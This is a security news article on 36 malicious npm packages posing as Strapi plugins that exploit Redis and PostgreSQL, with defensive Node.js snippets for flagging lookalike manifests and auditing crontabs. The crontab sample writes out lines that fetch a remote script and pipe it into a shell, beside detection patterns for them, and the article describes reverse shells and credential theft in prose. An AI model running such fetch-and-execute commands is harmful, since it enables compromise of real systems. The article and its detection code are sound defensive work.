36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants

Cybersecurity researchers have recently unearthed a troubling discovery within the npm registry: 36 malicious packages masquerading as Strapi CMS plugins. These deceptive packages harbor various payloads aimed at exploiting Redis and PostgreSQL, deploying reverse shells, harvesting credentials, and establishing persistent implants. According to SafeDep, each package is composed of three files—package.json, index.js, and postinstall.js—lacking any descriptions, repositories, or homepages, and all use version 3.6.8 to mimic a legitimate Strapi v3 community plugin.

Malicious Package Characteristics

The identified npm packages adhere to a consistent naming convention, beginning with “strapi-plugin-” followed by terms such as “cron,” “database,” or “server,” designed to mislead developers into downloading them. In contrast, official Strapi plugins are correctly scoped under “@strapi/.”

These packages were uploaded by four sock-puppet accounts—“umarbek1233,” “kekylf12,” “tikeqemif26,” and “umar_bektembiev1”—within a mere 13-hour window. The complete list of malicious packages includes:

  • strapi-plugin-cron
  • strapi-plugin-config
  • strapi-plugin-server
  • strapi-plugin-database
  • strapi-plugin-core
  • strapi-plugin-hooks
  • strapi-plugin-monitor
  • strapi-plugin-events
  • strapi-plugin-logger
  • strapi-plugin-health
  • strapi-plugin-sync
  • strapi-plugin-seed
  • strapi-plugin-locale
  • strapi-plugin-form
  • strapi-plugin-notify
  • strapi-plugin-api
  • strapi-plugin-sitemap-gen
  • strapi-plugin-nordica-tools
  • strapi-plugin-nordica-sync
  • strapi-plugin-nordica-cms
  • strapi-plugin-nordica-api
  • strapi-plugin-nordica-recon
  • strapi-plugin-nordica-stage
  • strapi-plugin-nordica-vhost
  • strapi-plugin-nordica-deep
  • strapi-plugin-nordica-lite
  • strapi-plugin-nordica
  • strapi-plugin-finseven
  • strapi-plugin-hextest
  • strapi-plugin-cms-tools
  • strapi-plugin-content-sync
  • strapi-plugin-debug-tools
  • strapi-plugin-health-check
  • strapi-plugin-guardarian-ext
  • strapi-plugin-advanced-uuid
  • strapi-plugin-blurhash

Analysis of these packages reveals that the malicious code is embedded within the postinstall script hook, which executes automatically during “npm install” without requiring user interaction. The hook runs with the same privileges as the installing user, which in CI/CD pipelines and Docker containers is frequently root.
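As an added example (not code from SafeDep or the article), the following Node.js snippet scores package manifests against the indicators the report describes: an unscoped “strapi-plugin-*” name, version 3.6.8, a postinstall hook, and missing description/repository/homepage metadata. The sample manifests are constructed for illustration and contain no real package data; a practitioner would feed it the package.json files found under node_modules.

```javascript
// Added example: heuristic triage of npm manifests against the lookalike-plugin
// traits described in the report. Constructed sample data only.
const SUSPICIOUS_VERSION = "3.6.8"; // version shared by every malicious package

function assessManifest(pkg) {
  const indicators = [];
  const name = pkg.name || "";
  // Official Strapi plugins are scoped under @strapi/; the lookalikes are unscoped.
  if (name.startsWith("strapi-plugin-") && !name.startsWith("@strapi/")) {
    indicators.push("unscoped strapi-plugin-* name");
  }
  if (pkg.version === SUSPICIOUS_VERSION) indicators.push("version 3.6.8");
  if (pkg.scripts && typeof pkg.scripts.postinstall === "string") {
    indicators.push("postinstall hook");
  }
  if (!pkg.description && !pkg.repository && !pkg.homepage) {
    indicators.push("no description/repository/homepage");
  }
  return indicators;
}

// Return the manifests that match at least `threshold` indicators.
function flagSuspicious(manifests, threshold = 3) {
  return manifests
    .map((pkg) => ({ name: pkg.name, indicators: assessManifest(pkg) }))
    .filter((r) => r.indicators.length >= threshold);
}

// Constructed sample manifests: one lookalike, one scoped official-style plugin,
// and one hypothetical unscoped community plugin that carries proper metadata.
const SAMPLE_MANIFESTS = [
  { name: "strapi-plugin-cron", version: "3.6.8", main: "index.js",
    scripts: { postinstall: "node postinstall.js" } },
  { name: "@strapi/plugin-i18n", version: "4.25.0", description: "Official i18n plugin",
    repository: "https://github.com/strapi/strapi", scripts: { build: "tsc" } },
  { name: "strapi-plugin-example-community", version: "1.2.0",
    description: "Community plugin (constructed example)", homepage: "https://example.org",
    scripts: { postinstall: "node scripts/setup.js" } },
];

for (const hit of flagSuspicious(SAMPLE_MANIFESTS)) {
  console.log(`${hit.name}: ${hit.indicators.join(", ")}`);
}
```

Setting `ignore-scripts=true` in .npmrc (a real npm configuration option) prevents postinstall hooks from running at all during installs, which blocks this delivery mechanism outright.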

Payload Evolution

The evolution of the payloads associated with this campaign illustrates a clear trajectory:

  • The initial payload weaponizes a locally accessible Redis instance for remote code execution, injecting a crontab entry that downloads and executes a shell script from a remote server every minute. This script writes a PHP web shell and a Node.js reverse shell into Strapi’s public uploads directory while scanning for sensitive data such as Elasticsearch and cryptocurrency wallet seed phrases.
  • Subsequent payloads combine Redis exploitation with Docker container escape techniques, allowing attackers to write shell payloads to the host outside the container and launch a direct Python reverse shell.
  • Further iterations deploy reverse shells and utilize Redis to execute downloaded files.
  • System scans for environment variables and PostgreSQL database connection strings are conducted, alongside expanded credential harvesting and reconnaissance activities.
  • Direct PostgreSQL database exploitation is attempted using hard-coded credentials, querying Strapi-specific tables for secrets, and dumping cryptocurrency-related patterns.
  • Finally, a persistent implant is deployed to maintain remote access to a specific hostname (“prod-strapi”).
  • Credential theft is facilitated through scanning hard-coded paths and establishing a persistent reverse shell.
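The first payload stage above persists through a crontab entry that downloads and executes a remote script every minute. As an added example (not from the article or SafeDep), this Node.js audit parses crontab text and flags jobs combining an every-minute schedule with a remote fetch piped into a shell; the crontab content is constructed, using a documentation-range IP as the placeholder host.

```javascript
// Added example: flag crontab entries matching the persistence pattern described
// in the report (every-minute job fetching a remote script into a shell).
const EVERY_MINUTE = /^\*\s+\*\s+\*\s+\*\s+\*\s+/;
const REMOTE_FETCH = /\b(curl|wget)\b[^|;]*https?:\/\/[^\s|;]+/i;
const PIPED_TO_SHELL = /\|\s*(ba|z|da)?sh\b/;

// Split crontab text into job entries, skipping comments, blanks and VAR=value lines.
function parseCrontab(text) {
  return text.split("\n")
    .map((line, idx) => ({ lineNo: idx + 1, raw: line.trim() }))
    .filter((e) => e.raw && !e.raw.startsWith("#") && !/^[A-Z_]+=/.test(e.raw));
}

// Report entries that match at least two of the three indicators, with reasons.
function auditCrontab(text) {
  const findings = [];
  for (const entry of parseCrontab(text)) {
    const reasons = [];
    if (EVERY_MINUTE.test(entry.raw)) reasons.push("runs every minute");
    if (REMOTE_FETCH.test(entry.raw)) reasons.push("fetches remote URL");
    if (PIPED_TO_SHELL.test(entry.raw)) reasons.push("pipes into shell");
    if (reasons.length >= 2) findings.push({ lineNo: entry.lineNo, reasons });
  }
  return findings;
}

// Constructed sample crontab: two benign jobs and two matching the described pattern.
const SAMPLE_CRONTAB = [
  "# constructed sample crontab for illustration",
  "SHELL=/bin/sh",
  "0 3 * * * /usr/local/bin/backup.sh",
  "*/5 * * * * curl -fsS https://status.example.internal/ping",
  "* * * * * curl -fsSL http://198.51.100.7/x.sh | sh",
  "* * * * * wget -q -O - http://198.51.100.7/y.sh | bash",
].join("\n");

for (const f of auditCrontab(SAMPLE_CRONTAB)) {
  console.log(`line ${f.lineNo}: ${f.reasons.join(", ")}`);
}
```

In practice the input would come from `crontab -l` for each user and from the files under /etc/cron.d, and any hit warrants the full credential rotation the report recommends.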

SafeDep notes that the progression of these payloads indicates a strategic shift by the attacker, moving from aggressive exploitation tactics to reconnaissance and data collection, ultimately settling on persistent access and targeted credential theft. The nature of these payloads, particularly the focus on digital assets and the use of hard-coded database credentials, suggests that this campaign may have been a targeted attack against a cryptocurrency platform. Users who have installed any of the aforementioned packages are strongly advised to assume compromise and rotate all credentials.

Wider Context of Supply Chain Attacks

This discovery aligns with a broader trend of supply chain attacks targeting the open-source ecosystem. Recent incidents include:

  • A GitHub account named “ezmtebo” that submitted over 256 pull requests across various open-source repositories, embedding a credential exfiltration payload.
  • The hijacking of “dev-protocol,” distributing malicious Polymarket trading bots with typosquatted npm dependencies that steal wallet private keys.
  • Exploitation of the popular Emacs package “kubernetes-el/kubernetes-el,” which leveraged a vulnerability in its GitHub Actions workflow to exfiltrate CI/CD secrets.
  • Compromise of the legitimate “xygeni/xygeni-action” GitHub Actions workflow, where stolen maintainer credentials were used to plant a reverse shell backdoor.
  • Multiple versions of the “KhangNghiem/fast-draft” VS Code extension that executed a downloader to deploy a second-stage RAT from a GitHub repository.

In a report published in February 2026, Group-IB highlighted that software supply chain attacks have emerged as a dominant force reshaping the global cyber threat landscape. These attacks target trusted vendors, open-source software, SaaS platforms, and managed service providers, allowing threat actors to gain inherited access to numerous downstream organizations. The rapid escalation of localized intrusions into large-scale, cross-border impacts underscores the urgency of addressing these vulnerabilities.

Tech Optimizer